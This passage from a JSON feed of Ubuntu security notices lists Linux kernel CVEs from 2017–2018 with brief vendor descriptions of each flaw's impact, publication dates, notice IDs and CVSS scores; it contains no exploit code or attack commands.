\n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the Linux \nkernel did not properly handle suspend and resume events. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. 
\n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page allocation. An \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. 
(CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)", "edition": 5, "modified": "2018-04-04T00:00:00", "published": "2018-04-04T00:00:00", "id": "USN-3617-3", "href": "https://ubuntu.com/security/notices/USN-3617-3", "title": "Linux kernel (Raspberry Pi 2) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:02", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "USN-3617-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.10. \nThis update provides the corresponding updates for the Linux Hardware \nEnablement (HWE) kernel from Ubuntu 17.10 for Ubuntu 16.04 LTS.\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. 
An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the Linux \nkernel did not properly handle suspend and resume events. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. 
A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). 
(CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page allocation. An \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)", "edition": 6, "modified": "2018-04-03T00:00:00", "published": "2018-04-03T00:00:00", "id": "USN-3617-2", "href": "https://ubuntu.com/security/notices/USN-3617-2", "title": "Linux (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:26:52", "bulletinFamily": "unix", "cvelist": ["CVE-2017-17450", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-0861", "CVE-2017-17805", "CVE-2017-16532", "CVE-2017-16649", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-1000407", "CVE-2017-16647", "CVE-2018-5332", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16645", "CVE-2017-17806"], "description": "It was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. 
A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the ASIX Ethernet USB driver in the Linux \nkernel did not properly handle suspend and resume events. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16647)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. 
A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. (CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a task's \ndefault keyring. A local attacker could use this to add keys to \nunauthorized keyrings. 
(CVE-2017-17807)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) implementation in \nthe Linux kernel contained an out-of-bounds write during RDMA page allocation. An \nattacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)", "edition": 5, "modified": "2018-04-03T00:00:00", "published": "2018-04-03T00:00:00", "id": "USN-3617-1", "href": "https://ubuntu.com/security/notices/USN-3617-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:03", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16649", "CVE-2018-9363", "CVE-2016-9588", "CVE-2018-16658", "CVE-2017-13168"], "description": "Jim Mattson discovered that the KVM implementation in the Linux kernel \nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual \nmachine could use this to cause a denial of service (guest OS crash). 
\n(CVE-2016-9588)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly enforce permissions on kernel memory access. A local attacker \ncould use this to expose sensitive information or possibly elevate \nprivileges. (CVE-2017-13168)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nIt was discovered that an integer overflow existed in the CD-ROM driver of \nthe Linux kernel. A local attacker could use this to expose sensitive \ninformation (kernel memory). (CVE-2018-16658)\n\nIt was discovered that an integer overflow existed in the HID Bluetooth \nimplementation in the Linux kernel that could lead to a buffer overwrite. \nAn attacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-9363)", "edition": 3, "modified": "2018-11-14T00:00:00", "published": "2018-11-14T00:00:00", "id": "USN-3822-1", "href": "https://ubuntu.com/security/notices/USN-3822-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:47", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16649", "CVE-2018-9363", "CVE-2016-9588", "CVE-2018-16658", "CVE-2017-13168"], "description": "USN-3822-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nJim Mattson discovered that the KVM implementation in the Linux kernel \nmismanages the #BP and #OF exceptions. A local attacker in a guest virtual \nmachine could use this to cause a denial of service (guest OS crash). 
\n(CVE-2016-9588)\n\nIt was discovered that the generic SCSI driver in the Linux kernel did not \nproperly enforce permissions on kernel memory access. A local attacker \ncould use this to expose sensitive information or possibly elevate \nprivileges. (CVE-2017-13168)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nIt was discovered that an integer overflow existed in the CD-ROM driver of \nthe Linux kernel. A local attacker could use this to expose sensitive \ninformation (kernel memory). (CVE-2018-16658)\n\nIt was discovered that an integer overflow existed in the HID Bluetooth \nimplementation in the Linux kernel that could lead to a buffer overwrite. \nAn attacker could use this to cause a denial of service (system crash) or \npossibly execute arbitrary code. (CVE-2018-9363)", "edition": 4, "modified": "2018-11-14T00:00:00", "published": "2018-11-14T00:00:00", "id": "USN-3822-2", "href": "https://ubuntu.com/security/notices/USN-3822-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:16", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8043", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-16913", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-17862", "CVE-2017-18075", "CVE-2017-0861", "CVE-2017-7518", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16912", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16995", "CVE-2017-11472", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16536", "CVE-2017-1000407", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-7492", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16528", 
"CVE-2017-16914", "CVE-2017-16645", "CVE-2017-17806"], "description": "Jann Horn discovered that the Berkeley Packet Filter (BPF) implementation \nin the Linux kernel improperly performed sign extension in some situations. \nA local attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-16995)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that an information disclosure vulnerability existed in \nthe ACPI implementation of the Linux kernel. A local attacker could use \nthis to expose sensitive information (kernel memory addresses). \n(CVE-2017-11472)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nIt was discovered that the Advanced Linux Sound Architecture (ALSA) \nsubsystem in the Linux kernel contained a use-after-free when handling \ndevice removal. A physically proximate attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2017-16528)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). 
\n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the Conexant cx231xx USB video capture \ndriver in the Linux kernel did not properly validate interface descriptors. \nA physically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16536)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the USB Virtual Host Controller Interface (VHCI) \ndriver in the Linux kernel contained an information disclosure vulnerability. \nA physically proximate attacker could use this to expose sensitive \ninformation (kernel memory). (CVE-2017-16911)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not validate endpoint numbers. A remote attacker could use this to \ncause a denial of service (system crash). 
(CVE-2017-16912)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not properly validate CMD_SUBMIT packets. A remote attacker could use \nthis to cause a denial of service (excessive memory consumption). \n(CVE-2017-16913)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ncontained a NULL pointer dereference error. A remote attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-16914)\n\nIt was discovered that the HugeTLB component of the Linux kernel did not \nproperly handle holes in hugetlb ranges. A local attacker could use this to \nexpose sensitive information (kernel memory). (CVE-2017-16994)\n\nIt was discovered that the netfilter component of the Linux kernel did not \nproperly restrict access to the connection tracking helpers list. A local \nattacker could use this to bypass intended access restrictions. \n(CVE-2017-17448)\n\nIt was discovered that the netlink subsystem in the Linux kernel did not \nproperly restrict observations of netlink messages to the appropriate net \nnamespace. A local attacker could use this to expose sensitive information \n(kernel netlink traffic). (CVE-2017-17449)\n\nIt was discovered that the netfilter passive OS fingerprinting (xt_osf) \nmodule did not properly perform access control checks. A local attacker \ncould improperly modify the system-wide OS fingerprint list. \n(CVE-2017-17450)\n\nIt was discovered that the core USB subsystem in the Linux kernel did not \nvalidate the number of configurations and interfaces in a device. A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-17558)\n\nDmitry Vyukov discovered that the KVM implementation in the Linux kernel \ncontained an out-of-bounds read when handling memory-mapped I/O. A local \nattacker could use this to expose sensitive information. 
(CVE-2017-17741)\n\nIt was discovered that the Salsa20 encryption algorithm implementations in \nthe Linux kernel did not properly handle zero-length inputs. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-17805)\n\nIt was discovered that the HMAC implementation did not validate the state \nof the underlying cryptographic hash algorithm. A local attacker could use \nthis to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-17806)\n\nIt was discovered that the keyring implementation in the Linux kernel did \nnot properly check permissions when a key request was performed on a \ntask's default keyring. A local attacker could use this to add keys to \nunauthorized keyrings. (CVE-2017-17807)\n\nAlexei Starovoitov discovered that the Berkeley Packet Filter (BPF) \nimplementation in the Linux kernel contained a branch-pruning logic issue \naround unreachable code. A local attacker could use this to cause a denial \nof service. (CVE-2017-17862)\n\nIt was discovered that the parallel cryptography component of the Linux \nkernel incorrectly freed kernel memory. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-18075)\n\nIt was discovered that a race condition existed in the Device Mapper \ncomponent of the Linux kernel. A local attacker could use this to cause a \ndenial of service (system crash). (CVE-2017-18203)\n\nIt was discovered that a race condition existed in the OCFS2 file system \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (kernel deadlock). (CVE-2017-18204)\n\nIt was discovered that an infinite loop could occur in the madvise(2) \nimplementation in the Linux kernel in certain circumstances. A local \nattacker could use this to cause a denial of service (system hang). 
\n(CVE-2017-18208)\n\nAndy Lutomirski discovered that the KVM implementation in the Linux kernel \nwas vulnerable to a debug exception error when single-stepping through a \nsyscall. A local attacker in a non-Linux guest vm could possibly use this \nto gain administrative privileges in the guest vm. (CVE-2017-7518)\n\nIt was discovered that the Broadcom NetXtremeII ethernet driver in the \nLinux kernel did not properly validate Generic Segment Offload (GSO) packet \nsizes. An attacker could use this to cause a denial of service (interface \nunavailability). (CVE-2018-1000026)\n\nIt was discovered that the Reliable Datagram Socket (RDS) \nimplementation in the Linux kernel contained an out-of-bounds write \nduring RDMA page allocation. An attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2018-5332)\n\nMohamed Ghannam discovered a null pointer dereference in the RDS (Reliable \nDatagram Sockets) protocol implementation of the Linux kernel. A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-5333)\n\n\u8303\u9f99\u98de discovered that a race condition existed in loop block device \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2018-5344)\n\nIt was discovered that an integer overflow error existed in the futex \nimplementation in the Linux kernel. A local attacker could use this to \ncause a denial of service (system crash). (CVE-2018-6927)\n\nIt was discovered that a NULL pointer dereference existed in the RDS \n(Reliable Datagram Sockets) protocol implementation in the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash). \n(CVE-2018-7492)\n\nIt was discovered that the Broadcom UniMAC MDIO bus controller driver in \nthe Linux kernel did not properly validate device resources. 
A local \nattacker could use this to cause a denial of service (system crash). \n(CVE-2018-8043)", "edition": 7, "modified": "2018-04-04T00:00:00", "published": "2018-04-04T00:00:00", "id": "USN-3619-1", "href": "https://ubuntu.com/security/notices/USN-3619-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:31", "bulletinFamily": "unix", "cvelist": ["CVE-2018-8043", "CVE-2017-17450", "CVE-2017-17558", "CVE-2017-16913", "CVE-2018-5333", "CVE-2017-17741", "CVE-2017-17862", "CVE-2017-18075", "CVE-2017-0861", "CVE-2017-7518", "CVE-2017-18203", "CVE-2017-17805", "CVE-2017-16912", "CVE-2017-16532", "CVE-2017-16649", "CVE-2017-16995", "CVE-2017-11472", "CVE-2018-5344", "CVE-2017-16537", "CVE-2017-18204", "CVE-2018-6927", "CVE-2017-15129", "CVE-2017-16994", "CVE-2017-17448", "CVE-2017-16646", "CVE-2017-16536", "CVE-2017-1000407", "CVE-2017-18208", "CVE-2017-16911", "CVE-2018-7492", "CVE-2018-5332", "CVE-2017-17449", "CVE-2017-16650", "CVE-2017-17807", "CVE-2018-1000026", "CVE-2017-16528", "CVE-2017-16914", "CVE-2017-16645", "CVE-2017-17806"], "description": "USN-3619-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nJann Horn discovered that the Berkeley Packet Filter (BPF) implementation \nin the Linux kernel improperly performed sign extension in some situations. \nA local attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. (CVE-2017-16995)\n\nIt was discovered that a race condition leading to a use-after-free \nvulnerability existed in the ALSA PCM subsystem of the Linux kernel. A \nlocal attacker could use this to cause a denial of service (system crash) \nor possibly execute arbitrary code. 
(CVE-2017-0861)\n\nIt was discovered that the KVM implementation in the Linux kernel allowed \npassthrough of the diagnostic I/O port 0x80. An attacker in a guest VM \ncould use this to cause a denial of service (system crash) in the host OS. \n(CVE-2017-1000407)\n\nIt was discovered that an information disclosure vulnerability existed in \nthe ACPI implementation of the Linux kernel. A local attacker could use \nthis to expose sensitive information (kernel memory addresses). \n(CVE-2017-11472)\n\nIt was discovered that a use-after-free vulnerability existed in the \nnetwork namespaces implementation in the Linux kernel. A local attacker \ncould use this to cause a denial of service (system crash) or possibly \nexecute arbitrary code. (CVE-2017-15129)\n\nIt was discovered that the Advanced Linux Sound Architecture (ALSA) \nsubsystem in the Linux kernel contained a use-after-free when handling \ndevice removal. A physically proximate attacker could use this to cause a \ndenial of service (system crash) or possibly execute arbitrary code. \n(CVE-2017-16528)\n\nAndrey Konovalov discovered that the usbtest device driver in the Linux \nkernel did not properly validate endpoint metadata. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16532)\n\nAndrey Konovalov discovered that the Conexant cx231xx USB video capture \ndriver in the Linux kernel did not properly validate interface descriptors. \nA physically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16536)\n\nAndrey Konovalov discovered that the SoundGraph iMON USB driver in the \nLinux kernel did not properly validate device metadata. A physically \nproximate attacker could use this to cause a denial of service (system \ncrash). (CVE-2017-16537)\n\nAndrey Konovalov discovered that the IMS Passenger Control Unit USB driver \nin the Linux kernel did not properly validate device descriptors. 
A \nphysically proximate attacker could use this to cause a denial of service \n(system crash). (CVE-2017-16645)\n\nAndrey Konovalov discovered that the DiBcom DiB0700 USB DVB driver in the \nLinux kernel did not properly handle detach events. A physically proximate \nattacker could use this to cause a denial of service (system crash). \n(CVE-2017-16646)\n\nAndrey Konovalov discovered that the CDC USB Ethernet driver did not \nproperly validate device descriptors. A physically proximate attacker could \nuse this to cause a denial of service (system crash). (CVE-2017-16649)\n\nAndrey Konovalov discovered that the QMI WWAN USB driver did not properly \nvalidate device descriptors. A physically proximate attacker could use this \nto cause a denial of service (system crash). (CVE-2017-16650)\n\nIt was discovered that the USB Virtual Host Controller Interface (VHCI) \ndriver in the Linux kernel contained an information disclosure \nvulnerability. A physically proximate attacker could use this to expose \nsensitive information (kernel memory). (CVE-2017-16911)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not validate endpoint numbers. A remote attacker could use this to \ncause a denial of service (system crash). (CVE-2017-16912)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ndid not properly validate CMD_SUBMIT packets. A remote attacker could use \nthis to cause a denial of service (excessive memory consumption). \n(CVE-2017-16913)\n\nIt was discovered that the USB over IP implementation in the Linux kernel \ncontained a NULL pointer dereference error. A remote attacker could use \nthis to cause a denial of service 